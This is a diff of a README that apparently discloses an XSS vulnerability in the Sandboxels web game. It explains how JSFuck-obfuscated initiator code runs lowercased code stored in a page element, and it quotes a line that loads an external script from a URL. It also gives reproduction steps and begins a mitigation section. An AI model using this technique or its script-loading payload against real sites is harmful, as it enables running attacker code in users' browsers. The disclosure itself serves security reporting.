ggod2/sandboxels_xss_test/README.md

 This code will turn any code found inside of an element with id of 1 into lowercase and run it.
 Since the initiator code can't contain lowercase letters, a tool like [JSFuck](https://jsfuck.com/) should be used to remove such characters.
 3. The attacker uses a `<p>` (or any other text-based tag) with an id of 1 to store the rest of the code.
 This code will be used to load an external script: `let a=document['createElement']('script');a.src='URL';document.head.append(a)`.
 Since this code will be turned into lowercase, it can't contain any uppercase characters, so a tool like JSFuck should be used to change any code that might contain such characters (such as 'createElement' in this case).
 That also mean that the URL can't contain such characters either.

-4. The attacker selects the Prop tool in Sandboxels, enters the initiator code (such as the code in `initiator.js`) into browser's console and uses Prop tool on some pixels.
-After hovering over those pixels, code found at the URL (in this case code from `test.js`, hosted using [jsdelivr](https://jsdelivr.com/)) will be executed.
+### Steps to reproduce
+1. Use the Prop tool in Sandboxels
+2. Paste the code from `initiator.js` into browser's console
+3. Use the Prop tool on some pixels
+4. Hover over those pixels
+5. Code from `test.js` should be executed

 ## Mitigation Recommendations
 To prevents this XSS vulnerability, the following measures should be implemented: